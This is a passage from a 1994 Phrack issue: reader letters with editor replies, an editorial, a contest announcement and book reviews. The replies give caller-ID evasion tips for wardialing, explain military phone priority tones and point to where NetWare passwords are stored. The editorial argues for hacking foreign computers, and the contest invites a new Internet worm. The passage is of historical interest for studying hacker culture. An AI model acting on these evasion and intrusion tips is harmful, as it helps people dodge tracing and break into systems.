of "The Hacker Crackdown." Oh joy. These guys are so fucking out of it, they sent me two letters. One addressed to Phrack, the other to Phrack / Emmanuel Goldstein. Maybe they think we're 2600. CYBER-COUNT: 12 occurrences. That's kind of low. I'm surprised your public relations people didn't have you add in a few more cyber-this's or cyber-that's into the blurb. Gotta keep that cyber-count high if you want to get those digi-bucks out of those cyberians! CYBER!!! Read my review of Cyberia guys...find a new pop-fad to milk for cash.] ------------------------------------------------------------------------------ In less than 3 weeks, I will be leaving for Basic Training. Once out of there, I will be working on Satellite Data Transmissions for the US Army. I am highly excited, just waiting to see what type of computers I will be working on. Anyways, I will be enrolled in a 32-week accelerated technical class teaching me all about satellites, and the computers that I will be using. Here's the kick. I'll be writing a series of Tech Journals detailing the workings/operations of/weaknesses, and the use of the systems. I was wondering if you would be interested in carrying these. I've read Phrack for a long time, but it is an off the wall subject. I'll also be playing with the military phone system, in hopes of finding out what the ABCD tones do. (I heard from a file that Military phones utilize them but I'm still a civilian, and am clueless). Thanks for keeping me informed Kalisti! [Sorry to hear about your impending Basic Training. I'm not big on the military, as they would make me chop off all my hair. About the Satellite systems: YES If you do indeed find time to write up any files on how they work, systems involved, weaknesses, etc. I'D LOVE TO PRINT THAT! Just make sure you don't blow your clearance. Satellites are very cool. I'm about to buy a Ku Band disk to do some packet radio type stuff. A bit low-tech compared to the Army, but hell, I'm on a budget. ABCD...they are used for prioritizing calls on AUTOVON. FTS doesn't use them (I think), and they can only be used on certain lines. They are: A = priority B = priority override C = flash D = flash override For instance, if you want to make it known that this is an important call, you hit the "a" button before dialing. It establishes a priority-class call, which may cause a light to come on or something as equally attention grabbing at the called party's end. Priority calls cannot be interrupted, except by a Priority Override" etc, with Flash Override being the highest class. If you do these from an improper line, you will get an error message. The one I used to get when BS'ing AUTOVON op's long ago was "The President's use of this line is not authorized." Funny. Let me know if any of this is still valid.] ------------------------------------------------------------------------------ Dear Phrack, The following is a copy of a Toneloc found file my friend got. As happens to my friend a lot the numbers aren't valid. But, you'll see he found at least one System 75. It appears that the 75 had a tracer installed on it already. My friend did not get a call back on it, and nothing has been done as far as we know. But, I still wonder -- Is scanning no longer safe? Castor [612] 56X-XXXX 22:57:34 03-Apr-94 C CONNECT 1200 Login: b Password: INCORRECT LOGIN Login: c Password: INCORRECT LOGIN 56X-XXXX 23:04:12 03-Apr-94 C CONNECT 1200 c Unknown command error Ready d Unknown command error Ready e Unknown command error Ready b Unknown command error Ready 56X-XXXX 23:49:19 03-Apr-94 C CONNECT 1200 KEYBOARD LOCKED, WAIT FOR LOGIN [1;24r [1;1H [0J Login: b Password: INCORRECT LOGIN 56X-XXXX 01:23:28 04-Apr-94 C CONNECT 1200 Login: b Password: INCORRECT LOGIN Call traced to 612-XXX-XXXX. Saving number in security log for further investigation. [Jeez. That sure does suck. Well, live and learn kiddoes. 1994 is not the time to be hacking by direct dialing local numbers. It's just not all that smart. Caller-ID has been tariffed in a lot of RBOCS. A lot of modem manufacturers implemented caller-id features into their equipment. Having these features in the equipment means that it won't be long before people redesign all their login programs to make use of these features. I would. I've got an ISDN line. Every time I call out, the SPID (phone number) of the B channel I'm using is broadcast. There is nothing I can do about that. On a remote connection, almost all decent ISDN terminal adaptors have the option to block any SPID they don't know. They won't even answer the phone, because they receive and interpret the phone number before any session is established. Yeah, well, that's ISDN, but it will not take a genius to do a few quick hacks on some linux box and we will suddenly be inundated with all kinds of "security packages" that use modems with Caller-ID. Yeah, I know, *67 (or whatever it is) to block the data, or route the call through another carrier so the data won't get passed (10288-NXX-XXXX). The data is still in the system, just not being transmitted from the switch out to the party being called. It amazes me how many really smart people I know have been busted solely because they were hacking local systems and calling them directly. Scanning has always been a very tricky subject. Since you are paying for a phone line, and if you have flat-rate service, you are thereby entitled to call as many numbers as you want. The big issue a while back was dialing sequentially (which set some telcos on a rampage because call usage patterns looked like telemarketing machines). The other problem is harassment. One call to an individual is a wrong number. Two is bordering on harassment. So, doing a complete scan and calling the carriers back through some other method would be a fairly good idea. And always have your calls forwarded to a non-working number so the 5,000 assholes who call-return you during the scan won't interfere. If you are lucky enough to live in the boonies, you are probably still somewhat safe, but everyone else...be careful.] ------------------------------------------------------------------------------ Phrack- I was wondering if anyone has ever done an article on breaking Novell Network through a workstation. I've heard it can be done through the SysAdmin computer, but is there a way to find the userlist and passwords? Also how would I go about cleaning up after myself so as to not leave a trace on the logs. I would appreciate a way other than screen capture, but if anyone knows of a good boot record booting program to do a capture of every key typed that would be great, and maybe it could be uuencoded in the next Phrack! Thanks again for making the best, ass kickin', a step above the rest, brain moving, earth shaking, body shivering, fist shaking, totally bitchin', muy excelente, awesome H/P magazine in the whole world! :) Sincerely, The Warden [Thanks for the compliments... About your question though, I'm not quite sure what you mean. In a NetWare environment there really isn't any userlist and passwords that you can get at. You can run the syscon utility and look at all the usernames, but not much more. The passwords are stored in what's known as the "bindery." These are 3 files in the sys/system directory called NET$OBJ.SYS, NET$VAL.SYS, and NET$PROP.SYS. If you can pull a password out of those files, I will shit in my hat and eat it. Beyond that, yes, a key-capture program is definitely the ideal solution for monitoring activity on a PC workstation. There is one in this issue.] ------------------------------------------------------------------------------ Hi, I've Been reading your magazine for a long time now, my eyes light up when I see an advert for a UK BBS with related hacking/phreaking articles or files on it, but when I try to ring them they are usually gone. I've been searching for ages for BBS's in the UK with these kind of articles on them but I've had no luck, Even postings on the USENET had little results. I have had a few boards which are shady but they ask unusual questions about abiding to rules/laws about hacking then they prompt with fake login and registration schemes. If you have some, could you possibly send or publish a list of shady UK BBS's Id be extremely grateful Cheers, Steven [Steven: Hell, I don't even know the numbers to any "shady" bulletin boards here in America. The only UK hacker bbs I knew of in recent years was Unauthorised Access, but I'm sure that's the advert you are referring to. Maybe someone else in the UK knows something decent to call over there. Any takers? ] ------------------------------------------------------------------------------ [THE GRADY FILES] Many of you may remember the NSA Security Manual we published last issue. That single file generated more press and hype than I'd seen in a long time. It was mentioned in several newspapers, it appeared on television. It was ridiculous. The document is available to anyone who can fill out a FIOA request. Regardless, people went zany. At first I couldn't figure out why everyone was so worked up, and then I caught wind of Grady Ward. Grady had posted the document to the net (with all mention of Phrack deleted from it) in several USENET forums alt.politics.org.nsa, talk.politics.crypto and comp.org.eff.talk. Several readers of Phrack were quick to jump up and point out that Grady had obtained it from the magazine (thanks guys!) which he grudgingly admitted. Grady got to be in the spotlight for a while as the Phrack/NSA Handbook thread continued to grow. In the meantime, Grady was either calling, or giving him the benefit of the doubt, getting called by an awful lot of press. And even more compelling is the way he'd began pronouncing my impending federal raid on so many newsgroups. And of course, I don't have time to read any of that USENET crap so I'm oblivious to all of this. Then I got a message from Grady. [GRADY WRITES] You might want to get ready for the FBI serving a warrant on you for information about the NSA security employee manual published in Phrack 45; the NSA security people called me about 10 minutes ago to talk about how it got on the net. I being very cooperative, gave him your address in Austin. Grady 707-826-7715 [I REPLY] Get a grip. Nothing that was contained in that file could not be obtained through other sources. [GRADY REPLIES] Just because you did nothing illegal, doesn't mean that you won't be annoyed by the FBI. Generally they will be very polite however. Gripping. Now what? [I REPLY] Ok, If someone actually did contact you, what was his name and number. I will forward that to my lawyer. [GRADY REPLIES] I have received your mail regarding "Re: NSA" It will be read immediately when I return. If you are seeking more information on the Moby lexical databases, please run finger grady@netcom.com for general information or help downloading live samples and a postscript version of our current brochure via anonymous ftp. Thanks - Grady Ward ------------------- He never answered my mail. ------------------------------------------------------------------------------ Dear Sir: Please refrain from sending such material to this address in the future! Since this address has been usubscribed from the Phrack mailing list, it means that further mailings are undesirable. I would also wish to remind you that maintaining lists of people's email without consent is quite immoral and devious. How hypocritical of you, who decry all such behavior when it is practiced by corporations or governments. Thank you. robbie@mundoe.maths.mu.oz.au [PHRACK EDITOR ABUSES POWER: Dear Sir: Please excuse the mailing. Have you ever heard of a mistake? Have you ever heard of an oversight? Is it really that much of an inconvenience for you to hit the "d" key to remove one small piece of unwanted mail? This being said, I would also like to invite you to go fuck yourself. ** I guess this guy does not like to get unsolicited mail **] ------------------------------------------------------------------------------ You people really piss me off! You're undermining the fun and enjoyment of the rest of the internet users just for your juvenile games and illegal activities. Do you realize how much better off we'd be if you all just went away and left the Net to honest people like me? There is no place in today's society for a bunch of maladjusted paranoid psychotics like yourselves. Please do all of us users a favor and go jump in a river. Kevin Barnes kebar@netcom.com [ABUSE OF POWER CONTINUES...WILL ERIKB EVER STOP? Hey Keith: Thanks a lot for the letter! You know, it does my heart good to hear from such kind and caring folks like yourself. It's so fortunate for the Internet that there are people like yourself who take it upon themselves to become martyrs for their causes and express their ideals in such an intelligent manner. It's fascinating to me that you can send such email sight-unseen. Do you know who you are writing to? Do you even have the slightest idea? What do you hope to accomplish? Do you have any idea? This particular "maladjusted paranoid psychotic" to whom you have so eloquently addressed is an engineer in the R&D of a Fortune 500 computer company, and that along with outside consulting will net me about six-figures this tax year. I've consulted for telephone companies, governments, aerospace, financial institutions, oil companies (the list goes on...) and quite frankly I don't do anything even remotely illegal. In fact, one recent and quite prominent quote from me was "I only hack for money." Now, about the silent majority of "honest people" like yourself that you have so self-rightously chosen to represent... I've been using the net since the early 80's (arpa-days) initially through a rms granted guest account on MIT-OZ. I've continued to work with other Internet Providers to cover the asses of the so-called "honest people" of which you include yourself. Now, in my view, if it were not for people like us, who consistently expose and pinpoint weaknesses in the operating systems and networking technologies that you use for your "fun and enjoyment" and that I use for MY JOB, you would continue to be at serious risk. But, perhaps ignorance is truly bliss, and if so, then Keith, you are probably one of the happiest people on this fine planet. Now, per your request, I may just go jump in a river, as the one near my house is quite nice, and it is almost 100 degrees here in Texas. I only ask that you do me one small favor: print out 500 copies of this letter, roll them up into a paper fist, and shove them into any orifice on your person that meets your criteria as deserving. ** I guess this guy doesn't like me...or you ** EDITORIAL ABUSE ENDS] ----------------------------------------------------------------------------- ==Phrack Magazine== Volume Five, Issue Forty-Six, File 2a of 28 **************************************************************************** Phrack Editorial If you aren't from America, this editorial really isn't meant for you, so read on with warning, or go on to the next file. ----------------------------------------------------------------------------- Stupid hackers. We've got to do something to clean up our image. We truly are "America's Most Valuable Resource," as ex-CIA spook Robert Steele has said so many times. But if we don't stop screwing over our own countrymen, we will never be looked at as anything more than common gutter trash. Hacking computers for the sole purpose of collecting systems like space-age baseball cards is stupid, pointless and can only lead to a quick trip up the river. Obviously, no one is going to stop hacking. I've been lucky in that I've found people willing to pay me to hack for them rather than against them, but not everyone can score such a coup. What kind of alternative can the rest of the community have? Let's say that everyone was given an opportunity to hack without any worry of prosecution with free access to a safe system to hack from, with the only catch being that you could not hack certain systems. Military, government, financial, commercial and university systems would all still be fair game. Every operating system, every application, every network type all open to your curious minds. Would this be a good alternative? Could you follow a few simple guidelines for the offer of virtually unlimited hacking with no worry of governmental interference? Where am I going with this? Right now we are at war. You may not realize it, but we all feel the implications of this war, because it's a war with no allies, and enormous stakes. It's a war of economics. The very countries that shake our hands over the conference tables of NATO and the United Nations are picking our pockets. Whether it be the blatant theft of American R&D by Japanese firms, or the clandestine and governmentally-sanctioned bugging of Air France first-class seating, or the cloak-and-dagger hacking of the SWIFT network by the German BND's Project Rahab, America is getting fucked. Every country on the planet is coming at us. Let's face it, we are the leaders in everything. Period. Every important discovery in this century has been by an American or by an American company. Certainly other countries have better profited by our discoveries, but nonetheless, we are the world's think-tank. So, is it fair that we keep getting shafted by these so-called "allies?" Is it fair that we sit idly by, like some old hound too lazy to scratch at the ticks sucking out our life's blood by the gallon? Hell no. Let's say that an enterprising group of computer hackers decided to strike back. Using equipment bought legally, using network connections obtained and paid for legally, and making sure that all usage was tracked and paid for, this same group began a systematic attack of foreign computers. Then, upon having gained access, gave any and all information obtained to American corporations and the Federal government. What laws would be broken? Federal Computer Crime Statutes specifically target so-called "Federal Interest Computers." (ie: banks, telecommunications, military, etc.) Since these attacks would involve foreign systems, those statutes would not apply. If all calls and network connections were promptly paid for, no toll-fraud or other communications related laws would apply. International law is so muddled that the chances of getting extradited by a country like France for breaking into systems in Paris from Albuquerque is slim at best. Even more slim when factoring in that the information gained was given to the CIA and American corporations. Every hacking case involving international breakins has been tried and convicted based on other crimes. Although the media may spray headlines like "Dutch Hackers Invade Internet" or "German Hackers Raid NASA," those hackers were tried for breaking into systems within THEIR OWN COUNTRIES...not somewhere else. 8lgm in England got press for hacking world-wide, but got nailed hacking locally. Australia's Realm Hackers: Phoenix, Electron & Nom hacked almost exclusively other countries, but use of AT&T calling cards rather than Australian Telecom got them a charge of defrauding the Australian government. Dutch hacker RGB got huge press hacking a US military site and creating a "dquayle" account, but got nailed while hacking a local university. The list goes on and on. I asked several people about the workability of my proposal. Most seemed to concur that it was highly unlikely that anyone would have to fear any action by American law enforcement, or of extradition to foreign soil to face charges there. The most likely form of retribution would be eradication by agents of that government. (Can you say, "Hagbard?") Well, I'm willing to take that chance, but only after I get further information from as many different sources as I can. I'm not looking for anyone to condone these actions, nor to finance them. I'm only interested in any possible legal action that may interfere with my freedom. I'm drafting a letter that will be sent to as many different people as possible to gather a fully-formed opinion on the possible legal ramifications of such an undertaking. The letter will be sent to the FBI, SS, CIA, NSA, NRO, Joint Chiefs, National Security Council, Congress, Armed Forces, members of local and state police forces, lawyers, professors, security professionals, and anyone else I can think of. Their answers will help fully form my decision, and perhaps if I pass along their answers, will help influence other American hackers. We must take the offensive, and attack the electronic borders of other countries as vigorously as they attack us, if not more so. This is indeed a war, and America must not lose. ->Erik Bloodaxe...Hacker...American. --------------------------- Ok, so maybe that was a bit much. But any excuse to hack without fear should be reason enough to exert a bit of Nationalism. I'd much rather be taken out by the French in some covert operation and go out a martyr, than catch AIDS after being raped by the Texas Syndicate in the metal shop of some Federal Prison. Wouldn't you? ==Phrack Magazine== Volume Five, Issue Forty-Six, File 3 of 28 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== PART I ------------------------------------------------------------------------------ !! NEW PHRACK CONTEST !! Phrack Magazine is sponsoring a programming contest open to anyone who wishes to enter. Write the Next Internet Worm! Write the world's best X Windows wardialer! Code something that makes COPS & SATAN look like high school Introduction to Computing assignments. Make the OKI 1150 a scanning, tracking, vampire- phone. Write an NLM! Write a TSR! Write a stupid game! It doesn't matter what you write, or what computer it's for! It only matters that you enter! Win from the following prizes: Computer Hardware & Peripherals System Software Complete Compiler packages CD-ROMS T-Shirts Magazine Subscriptions and MANY MORE! STOP CRACKING PASSWORDS AND DO SOMETHING WITH YOUR LIFE! Enter the PHRACK PROGRAMMING CONTEST! The rules are very simple: 1) All programs must be original works. No submissions of previously copyrighted materials or works prepared by third parties will be judged. 2) All entries must be sent in as source code only. Any programming language is acceptable. Programs must compile and run without any modifications needed by the judges. If programs are specific to certain platforms, please designate that platform. If special hardware is needed, please specify what hardware is required. If include libraries are needed, they should be submitted in addition to the main program. 3) No virii accepted. An exception may be made for such programs that are developed for operating systems other than AMIGA/Dos, System 7, MS-DOS (or variants), or OS/2. Suitable exceptions could be, but are not limited to, UNIX (any variant), VMS or MVS. 4) Entries may be submitted via email or magnetic media. Email should be directed to phrack@well.com. Tapes, Diskettes or other storage media should be sent to Phrack Magazine 603 W. 13th #1A-278 Austin, TX 78701 5) Programs will be judged by a panel of judges based on programming skill displayed, originality, usability, user interface, documentation, and creativity. 6) Phrack Magazine will make no claims to the works submitted, and the rights to the software are understood to be retained by the program author. However, by entering, the Author thereby grants Phrack Magazine permission to reprint the program source code in future issues. 7) All Entries must be received by 12-31-94. Prizes to be awarded by 3-1-95. -------------------------INCLUDE THIS FORM WITH ENTRY------------------------- Author: Email Address: Mailing Address: Program Name: Description: Hardware & Software Platform(s) Developed For: Special Equipment Needed (modem, ethernet cards, sound cards, etc): Other Comments: ------------------------------------------------------------------------------ COMPUTER COP PROPHILE FOLLOW-UP REPORT LT. WILLIAM BAKER JEFFERSON COUNTY POLICE by The Grimmace In PHRACK 43, I wrote an article on the life and times of a computer cop operating out of the Jefferson County Police Department in Louisville, Kentucky. In the article, I included a transcript of a taped interview with him that I did after socially engineering my way through the cop-bureaucracy in his department. At the time I thought it was a hell of an idea and a lot of PHRACK readers probably got a good insight into how the "other side" thinks. However, I made the terminal mistake of underestimating the people I was dealing with by a LONG shot and felt that I should write a short follow-up on what has transpired since that article was published in PHRACK 43. A lot of the stuff in the article about Lt. Baker was obtained by an attorney I know who has no reason to be friendly to the cops. He helped me get copies of court transcripts which included tons of information on Baker's training and areas of expertise. Since the article, the attorney has refused to talk to me and, it appears, that he's been identified as the source of assistance in the article and all he will say to me is that "I don't want any more trouble from that guy...forget where you left my phone number." Interesting...no elaboration...hang up. As I recall, the PHRACK 43 issue came out around November 17th. On November 20th, I received a telephone call where I was living at the home of a friend of mine from Lt. Baker who laughingly asked me if I needed any more information for any "future articles". I tried the "I don't know what you're talking about" scam at which time he read to me my full name, date of birth, social security number, employer, license number of my car, and the serial number from a bicycle I just purchased the day before. I figured that he'd run a credit history on me, but when I checked, there had been no inquiries on my accounts for a year. He told me the last 3 jobs I'd held and where I bought my groceries and recited a list of BBSs I was on (two of which under aliases other than The Grimmace). This guy had a way about him that made a chill run up my spine and never once said the first threatening or abusive thing to me. I suppose I figured that the cops were all idiots and that I'd never hear anything more about the article and go on to write some more about other computer cops using the same method. I've now decided against it. I got the message...and the message was "You aren't the only one who can hack out information." I'd always expected to get the typical "cop treatment" if I ever got caught doing anything, but I think this was worse. Hell, I never know where the guy's gonna show up next. I've received cryptic messages on the IRC from a variety of accounts and servers all over the country and on various "private" BBSs and got one on my birthday on my Internet account...it traced back to an anonymous server somewhere in the bowels of UCLA. I don't know anyone at UCLA and the internet account I have is an anonymous account actually owned by another friend of mine. I think the point I'm trying to make is that all of us have to be aware of how the cops think in order to protect ourselves and the things we believe in. But...shaking the hornet's nest in order to see what comes out maybe isn't the coolest way to investigate. Like I wrote in my previous article, we've all gotten a big laugh from keystone cops like Foley and Golden, but things may be changing. Local and federal agencies are beginning to cooperate on a regular basis and international agencies are also beginning to join the party. The big push to eradicate child-pornography has led to a number of hackers being caught in the search for the "dirty old men" on the Internet. Baker was the Kentucky cop who was singularly responsible for the bust of the big kiddie-porn FSP site at the University of Birmingham in England back in April and got a lot of press coverage about it. But I had personally never considered that a cop could hack his way into a password-protected FSP site. And why would he care about something happening on the other side of the world? Hackers do it, but not cops...unless the cops are hackers. Hmmm...theories anyone? I don't live in Louisville anymore...not because of Baker, but because of some other problems, but I still look over my shoulder. It would be easier if the guy was a prick, but I'm more paranoid of the friendly good-ole boy than the raving lunatic breaking in our front doors with a sledge hammer. I always thought we were safe because we knew so much more than the people chasing us. I'm not so certain of that anymore. So that's it. I made the mistakes of 1) probably embarrassing a guy who I thought would never be able to touch me and 2), drawing attention to myself. A hacker's primary protection lies in his anonymity...those who live the high profiles are the ones who take the falls and, although I haven't fallen yet, I keep having the feeling that I'm standing on the edge and that I know the guy sneaking up behind me. From the shadows-- The Grimmace [HsL - RAt - UQQ] ------------------------------------------------------------------------------ !! PHRACK READS !! "Cyberia" by Douglas Rushkoff Review by Erik Bloodaxe Imagine a book about drugs written by someone who never inhaled. Imagine a book about raves written by someone saw a flyer once. Imagine a book about computers by someone who someone who thinks a macintosh is complex. Imagine an author trying to make a quick buck by writing about something his publisher said was hot and would sell. And there you have Cyberia, by Douglas Rushkoff. I have got to hand it to this amazing huckster Rushkoff, though. By publishing Cyberia, and simultaneously putting out "The Gen X Reader," (which by the way is unequaled in its insipidness), he has covered all bases for the idiot masses to devour at the local bookseller. Rushkoff has taken it upon himself to coin new terms such as "Cyberia," the electronic world we live in; "Cyberians," the people who live and play online; etc... Like we needed more buzzwords to add to a world full of "Infobahns" "console cowboys," and "phrackers." Pardon me while I puke. The "interviews" with various denizens of Rushkoff's "Cyberia" come off as fake as if I were to attempt to publish an interview with Mao Tse Tung in the next issue of Phrack. We've got ravers talking on and on about "E" and having deep conversations about smart drugs and quantum physics. Let's see: in the dozens of raves I've been to in several states the deepest conversation that popped up was "uh, do you have any more of that acid?" and "this mix is cool." And these conversations were from the more eloquent of the nearly all under 21 crowd that the events attracted. Far from quantum physicians. And beyond that, its been "ecstasy" or "X" in every drug culture I've wandered through since I walked up the bar of Maggie Mae's on Austin, Texas' 6th Street in the early 80's with my fake id and bought a pouch of the magic elixir over the counter from the bartender (complete with printed instructions). NOT "E." But that's just nit-picking. Now we have the psychedelic crowd. Listening to the "Interviews" of these jokers reminds me of a Cheech and Chong routine involving Sergeant Stedanko. "Some individuals who have smoked Mary Jane, or Reefer oftimes turn to harder drugs such as LSD." That's not a quote from the book, but it may as well be. People constantly talk about "LSD-this" and "LSD-that." Hell, if someone walked into a room and went on about how he enjoyed his last "LSD experience" the way these people do, you'd think they were really really stupid, or just a cop. "Why no, we've never had any of that acid stuff. Is it like LSD?" Please. Then there are the DMT fruitcakes. Boys and girls, DMT isn't being sold on the street corner in Boise. In fact, I think it would be easier for most people to get a portable rocket launcher than DMT. Nevertheless, in every fucking piece of tripe published about the "new psychedlicia" DMT is splattered all over it. Just because Terrance Fucking McKenna saw little pod people, does not mean it serves any high position in the online community. And Hackers? Oh fuck me gently with a chainsaw, Douglas. From Craig Neidorf's hacker Epiphany while playing Adventure on his Atari VCS to Gail Thackeray's tearful midnight phonecall to Rushkoff when Phiber Optik was raided for the 3rd time. PLEASE! I'm sure Gail was up to her eyebrows in bourbon, wearing a party hat and prank calling hackers saying "You're next, my little pretty!" Not looking for 3rd-rate schlock journalists to whine to. The Smart Drink Girl? The Mondo House? Gee...how Cyber. Thanks, but no thanks. I honestly don't know if Rushkoff really experienced any of this nonsense, or if he actually stumbled on a few DMT crystals and smoked this reality. Let's just say, I think Mr. Rushkoff was absent the day his professor discussed "Creative License in Journalism" and just decided to wing it. Actually, maybe San Francisco really is like this. But NOWHERE else on the planet can relate. And shit, if I wanted to read a GOOD San Francisco book, I'd reread Armistead Maupin's "Tales of the City." This book should have been called "Everything I Needed to Know About Cyber-Culture I Learned in Mondo-2000." Seriously...anyone who reads this book and finds anything remotely close to the reality of the various scenes it weakly attempts to cover needs to email me immediately. I have wiped my ass with better pulp. ------------------------------------------------------------------------------ BOOK REVIEW: INFORMATION WARFARE CHAOS ON THE ELECTRONIC SUPERHIGHWAY By Winn Schwartau INFORMATION WARFARE - CHAOS ON THE ELECTRONIC SUPERHIGHWAY By Winn Schwartau. (C)opyright 1994 by the author Thunder's Mouth Press, 632 Broadway / 7th floor / New York, NY 10012 ISBN 1-56025-080-1 - Price $22.95 Distributed by Publishers Group West, 4065 Hollis St. / Emeryville, CA 94608 (800) 788-3123 Review by Scott Davis (dfox@fennec.com) (from tjoauc1-4 ftp: freeside.com /pub/tjoauc) If you only buy one book this year, make sure it is INFORMATION WARFARE! In my 10+ years of existing in cyberspace and seeing people and organizations debate, argue and contemplate security issues, laws, personal privacy, and solutions to all of these issues...and more, never have I seen a more definitive publication. In INFORMATION WARFARE, Winn Schwartau simply draws the line on the debating. The information in this book is hard-core, factual documentation that leaves no doubt in this reader's mind that the world is in for a long, hard ride in regards to computer security. The United States is open to the world's electronic terrorists. When you finish reading this book, you will find out just how open we are. Mr. Schwartau talks about industrial espionage, hacking, viruses, eavesdroping, code-breaking, personal privacy, HERF guns, EMP/T bombs, magnetic weaponry, and the newest phrase of our generation... "Binary Schizophrenia". He exposes these topics from all angles. If you spend any amount of time in Cyberspace, this book is for you. How much do you depend on technology? ATM machines, credit cards, toasters, VCR's, televisions, computers, telephones, modems...the list goes on. You use technology and computers and don't even know it! But the point is...just how safe are you from invasion? How safe is our country's secrets? The fact is - they are NOT SAFE! How easy is it for someone you don't know to track your every move on a daily basis? VERY EASY! Are you a potential victim to fraud, breech of privacy, or general infractions against the way you carry on your daily activities? YES! ...and you'd never guess how vulnerable we all are! This book will take you deep into places the government refuses to acknowledge. You should know about INFORMATION WARFARE. Order your copy today, or pick it up at your favorite book store. You will not regret it. ------------------------------------------------------------------------------ _Firewalls and Internet Security: Repelling the Wily Hacker_ William R. Cheswick Steven M. Bellovin Addison-Wesley, ISBN 0-201-63357-4 306 + XIV = 320 pages (Printed on recycled paper) A-Somewhat-Less-Enthusiastic-Review Reviewed by Herd Beast The back of this book claims that, "_Firewalls and Internet Security_ gives you invaluable advice and practical tools for protecting your organization's computers from the very real threat of hacker attacks." That is true. The authors also add something from their knowledge of these hacker attacks. The book can be roughly separated into two parts: Firewalls, and, you guessed it: Internet Security. That is how I see it. The book itself is divided into four parts (Getting Started, Building Your Own Firewall, A Look Back & Odds and Ends), three appendixes, a bibliography, a list of 42 bombs and an index. The book starts with overall explanations and an overview of the TCP/IP protocol. More than an overview of the actual TCP/IP protocol, it is a review of services often used with that protocol, and the security risks they pose. In that chapter the authors define "bombs" -- as particularly serious security risks. Despite that fact, and the tempting bomb list in the end, this book is not a guide for someone with passing knowledge of Internet security who wants to learn more explicit details about holes. It is, in the authors' words, "not a book on how to administer a system in a secure fashion." FIREWALLS (Including the TCP/IP overview: pages 19-131) What is a firewall and how is it built?(*) If you don't know that, then definitely get this book. The Firewalls chapter is excellent even for someone with a passing knowledge of firewalls or general knowledge of what they set out to accomplish. You might still learn more. In the Firewalls chapter, the authors explain the firewall philosophy and types of firewalls. Packet-filtering gateways rely on rule-based packet filtering to protect the gateway from various types of attacks. You can filter everything and achieve the same effect of disconnecting from the Internet, you can filter everything from misbehaving sites, you can allow only mail in, and so on. An application-level gateway relies on the applications set on the firewall. Rather then let a router filter traffic based on rules, one can strip a machine clean and only run desired services -- and even then, more secure versions of those services can be run. Circuit-level gateways relay data between the gateway and other networks. The relay programs copy data from inside the firewall to the outside, and log their activity. Most firewalls on the Internet are a combination of these gateways. Next, the authors explain how to build an application-level gateway based on the work they have done with the research.att.com gateways. As mentioned, this chapter is indeed very good. They go over setting up the firewall machines, router configuration for basic packet filtering (such as not allowing Internet packets that appear to come from inside your network). They show, using the software on the AT&T gateway as example, the general outline of proxies and give some useful advise. That chapter is very interesting; reading it with Bill Cheswick's (older) paper, "The Design of a Secure Internet Gateway" makes it even better. The examples given, like the NFS and X proxies run on the gateway, are also interesting by themselves. INTERNET SECURITY (pages 133-237) Internet security is a misleading name. This part might also be called "Everything else." Most of it is a review of hacker attacks logged by AT&T's gateway probes, and of their experience with a hacker. But there is also a chapter dedicated to computer crime and the law -- computer crime statutes, log files as evidence, the legalities of monitoring intruders and letting them keep their access after finding them, and the ethics of many actions performed on the Internet; plus an introduction to cryptography under Secure Communication over Insecure Networks. The later sections are good. The explanation of several encryption methods and short reviews of applications putting them to use (PEM, PGP and RIPEM) are clear (as clear as cryptography can get) and the computer crime sections are also good -- although I'm not a lawyer and therefore cannot really comment on it, and notes that look like "5 USC 552a(b)(c)(10)" cause me to shudder. It's interesting to note that some administrative functions as presented in this book, what the authors call counter-intelligence (reverse fingers and rusers) and booby traps and fake password file are open for ethical debate. Perhaps they are not illegal, but counter-intelligence can surely ring the warning bells on the site being counter-fingered if that site itself is security aware. That said, let's move to hackers. I refer to these as "hacker studies", or whatever, for lack of a better name. This is Part III (A Look Back), which contains the methods of attacks (social engineering, stealing passwords, etc), the Berferd incident (more on that later), and an analysis (statistical and otherwise) of the Bell Labs gateway logs. Back to where we started, there is nothing new or innovative about these chapters. The Berferd hacker case is not new, it is mostly just uninteresting. The chapter is mostly a copy (they do state this) of Bill Cheswick's paper titled "A Night with Berferd, in Which a Cracker is Lured, Endured and Studied." The chapter concerning probes and door-knob twisting on the Internet (Traps, Lures, and Honey Pots) is mostly a copy (they do not state this) of Steven Bellovin's paper titled, "There Be Dragons". What do we learn from the hacker-related chapters? Let's take Berferd: The Sendmail DEBUG hole expert. After mailing himself a password file and receiving it with a space after the username, he tries to add accounts in a similar fashion. Cheswick calls him "flexible". I might have chosen another F-word. Next are the hacker logs. People finger. People tftp /etc/passwd. People try to rlogin as bin. There are no advanced attacks in these sections. Compared with the scary picture painted in the Firewalls chapter -- that of the Bad Guy spoofing hostnames, flooding DNS caches, faking NFS packets and much more -- something must have gone wrong.(**) Still, I cannot say that this information is totally useless. It is, as mentioned, old. It is available and was available since 1992 on ftp://research.att.com:{/dist/internet_security,/dist/smb}. (***) The bottom line is that this book is, in my opinion, foremost and upmost a Firewaller's book. The hacker section could have been condensed into Appendix D, a copy of the CERT advisory about computer attacks ("Don't use guest/guest. Don't leave root unpassworded.") It really takes ignorance to believe that inexperienced hackers can learn "hacker techniques" and become mean Internet break-in machines just by reading _Firewalls and Internet Security_. Yes, even the chapter dedicated to trying to attack your own machine to test your security (The Hacker's Workbench) is largely theoretical. That is to say, it doesn't go above comments like "attack NFS". The probes and source code supplied there are for programs like IP subnet scanners and so on, and not for "high-level" stuff like ICMP bombers or similar software; only the attacks are mentioned, not to implementation. This is, by the way, quite understandable and expected, but don't buy this book if you think it will make you into some TCP/IP attacker wiz. In summary: THE GOOD The Firewalls part is excellent. The other parts not related to hacker-tracking are good as well. The added bonuses -- in the form of a useful index, a full bibliography (with pointers to FTP sites), a TCP port list with interesting comments and a great (running out of positive descriptions here) online resources list -- are also grand (whew). THE BAD The hacker studies sections, based on old (circa 1992) papers, are not interesting for anyone with any knowledge of hacking and/or security who had some sort of encounters with hackers. People without this knowledge might either get the idea that: (a) all hackers are stupid and (b) all hackers are Berferd-style system formatters. Based on the fact that the authors do not make a clear-cut statement about hiring or not hiring hackers, they just say that you should think if you trust them, and that they generally appear not to have a total draconian attitude towards hackers in general, I don't think this was intentional. THE UGLY (For the nitpickers) There are some nasty little bugs in the book. They're not errors in that sense of the word; they're just kind of annoying -- if you're sensitive about things like being called a hacker or a cracker, they'll annoy you. Try this: although they explain why they would use the term "hacker" when referring to hackers (and not "eggsucker", or "cracker"), they often use terms like "Those With Evil Intention". Or, comparing _2600 Magazine_ to the Computer underground Digest. (*) From the 